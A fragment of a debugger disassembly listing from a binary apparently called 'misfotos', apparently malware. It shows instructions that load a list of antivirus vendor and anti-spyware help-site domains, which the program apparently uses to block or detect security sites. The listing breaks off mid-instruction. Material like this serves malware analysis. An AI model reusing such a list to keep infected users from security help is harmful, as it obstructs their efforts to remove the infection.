004037BC C785 20FFFFFF 3>MOV DWORD PTR SS:[EBP-E0],misfotos.00409>; www.2-spyware.commvgtst
004037C6 C785 24FFFFFF 4>MOV DWORD PTR SS:[EBP-DC],misfotos.00409>; castlecops.commvgtst
004037D0 C785 28FFFFFF 5>MOV DWORD PTR SS:[EBP-D8],misfotos.00409>; www.castlecops.commvgtst
004037DA C785 2CFFFFFF 6>MOV DWORD PTR SS:[EBP-D4],misfotos.00409>; virusinfo.prevx.comwww.virusinfo.prevx.comforums.majorgeeks.commvgtst
004037E4 C785 30FFFFFF 8>MOV DWORD PTR SS:[EBP-D0],misfotos.00409>; www.virusinfo.prevx.comforums.majorgeeks.commvgtst
004037EE C785 34FFFFFF 9>MOV DWORD PTR SS:[EBP-CC],misfotos.00409>; forums.majorgeeks.commvgtst
004037F8 C785 38FFFFFF B>MOV DWORD PTR SS:[EBP-C8],misfotos.00409>; www.forums.majorgeeks.commvgtst
00403802 C785 3CFFFFFF C>MOV DWORD PTR SS:[EBP-C4],misfotos.00409>; eradicatespyware.netmvgtst
0040380C C785 40FFFFFF E>MOV DWORD PTR SS:[EBP-C0],misfotos.00409>; www.eradicatespyware.netmvgtst
00403816 C785 44FFFFFF 0>MOV DWORD PTR SS:[EBP-BC],misfotos.00409>; fortinet.commvgtst
00403820 C785 48FFFFFF 1>MOV DWORD PTR SS:[EBP-B8],misfotos.00409>; www.fortinet.commvgtst
0040382A C785 4CFFFFFF 2>MOV DWORD PTR SS:[EBP-B4],misfotos.00409>; fortiguardcenter.commvgtst
00403834 C785 50FFFFFF 3>MOV DWORD PTR SS:[EBP-B0],misfotos.00409>; www.fortiguardcenter.commvgtst
0040383E C785 54FFFFFF 5>MOV DWORD PTR SS:[EBP-AC],misfotos.00409>; trendmicro.commvgtst
00403848 C785 58FFFFFF 6>MOV DWORD PTR SS:[EBP-A8],misfotos.00409>; www.trendmicro.commvgtst
00403852 C785 5CFFFFFF 7>MOV DWORD PTR SS:[EBP-A4],misfotos.00409>; www.safer-networking.orgmvgtst
0040385C C785 60FFFFFF 9>MOV DWORD PTR SS:[EBP-A0],misfotos.00409>; safer-networking.orgmvgtst
00403866 C785 64FFFFFF B>MOV DWORD PTR SS:[EBP-9C],misfotos.00409>; auditmypc.commvgtst
00403870 C785 68FFFFFF C>MOV DWORD PTR SS:[EBP-98],misfotos.00409>; www.auditmypc.commvgtst
0040387A C785 6CFFFFFF D>MOV DWORD PTR SS:[EBP-94],misfotos.00409>; pctools.comwww.pctools.comfirewallguide.commvgtst
00403884 C785 70FFFFFF E>MOV DWORD PTR SS:[EBP-90],misfotos.00409>; www.pctools.comfirewallguide.commvgtst
0040388E C785 74FFFFFF F>MOV DWORD PTR SS:[EBP-8C],misfotos.00409>; firewallguide.commvgtst
00403898 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],misfotos.00409>; www.firewallguide.commvgtst
004038A2 C785 7CFFFFFF 1>MOV DWORD PTR SS:[EBP-84],misfotos.00409>; spywaredb.commvgtst
004038AC C745 80 2C9B400>MOV DWORD PTR SS:[EBP-80],misfotos.00409>; www.spywaredb.commvgtst
004038B3 C745 84 409B400>MOV DWORD PTR SS:[EBP-7C],misfotos.00409>; virusspy.commvgtst
004038BA C745 88 509B400>MOV DWORD PTR SS:[EBP-78],misfotos.00409>; www.virusspy.commvgtst
004038C1 C745 8C 649B400>MOV DWORD PTR SS:[EBP-74],misfotos.00409>; eradicatespyware.netmvgtst
004038C8 C745 90 7C9B400>MOV DWORD PTR SS:[EBP-70],misfotos.00409>; www.eradicatespyware.netmvgtst
004038CF C745 94 989B400>MOV DWORD PTR SS:[EBP-6C],misfotos.00409>; spywareterminator.commvgtst
004038D6 C745 98 B09B400>MOV DWORD PTR SS:[EBP-68],misfotos.00409>